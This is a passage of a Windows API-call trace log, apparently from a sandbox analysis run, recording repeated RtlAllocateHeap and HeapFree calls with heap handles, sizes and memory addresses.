hHeap=0xe0000, dwFlags=0x0, lpMem=0x106030 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105e80 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105730 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a00 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1060c0 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105c40 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105850 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106150 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1089a0 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1086d0 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107f80 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1081c0 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108250 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108130 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106420 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0035.746] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xe6ed8 [0035.746] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0035.746] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0035.746] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x109488 [0035.746] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.746] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103d10 [0035.746] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0035.746] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106420 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0035.746] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106420 | out: hHeap=0xe0000) returned 1 [0035.746] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0035.746] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103a58 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0035.746] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x88) returned 0x105850 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103a58 | out: hHeap=0xe0000) returned 1 [0035.746] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0035.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105850 | out: hHeap=0xe0000) returned 1 [0035.747] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.747] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.747] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.747] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.747] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.747] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.747] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.747] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.747] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.747] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.747] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.747] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.747] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.747] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.747] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.747] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.747] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.747] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.747] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.747] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.747] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.748] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.748] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.748] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.748] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.748] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.748] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.748] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.748] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.748] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.748] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.748] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.748] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.748] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.748] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.748] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.748] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.748] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.748] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.748] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.748] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.748] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.748] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.748] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.748] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.748] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.748] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.748] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.748] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.748] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.748] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.748] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.748] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.748] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.748] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.748] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.748] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.748] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.748] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.748] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.748] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.748] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.748] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.748] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.749] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.749] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.749] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.749] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.749] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.749] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.749] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.749] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.749] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.749] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.749] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.749] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.749] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.749] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.749] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.749] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.749] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.749] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.749] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.749] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.749] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.749] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.749] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.749] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0035.749] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0035.749] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0035.749] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0035.749] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103d10 | out: hHeap=0xe0000) returned 1 [0035.749] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0035.749] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0035.749] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xe6ed8 | out: hHeap=0xe0000) returned 1 [0035.749] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106390 | out: hHeap=0xe0000) returned 1 [0035.749] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0035.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0035.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0035.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0035.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105a90 [0035.755] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0035.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106270 [0035.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x109258 [0035.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0xf6f70 [0035.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0035.755] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0035.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0035.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x10c) returned 0x109028 [0035.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103cf8 [0035.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106540 [0035.755] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0035.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0035.755] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106540 | out: hHeap=0xe0000) returned 1 [0035.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1052a0 [0035.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103c38 [0035.755] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1052a0 | out: hHeap=0xe0000) returned 1 [0035.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x88) returned 0x1056a0 [0035.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103c38 | out: hHeap=0xe0000) returned 1 [0035.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0035.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1056a0 | out: hHeap=0xe0000) returned 1 [0035.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.757] HeapFree (in: hHeap=0xe0000, 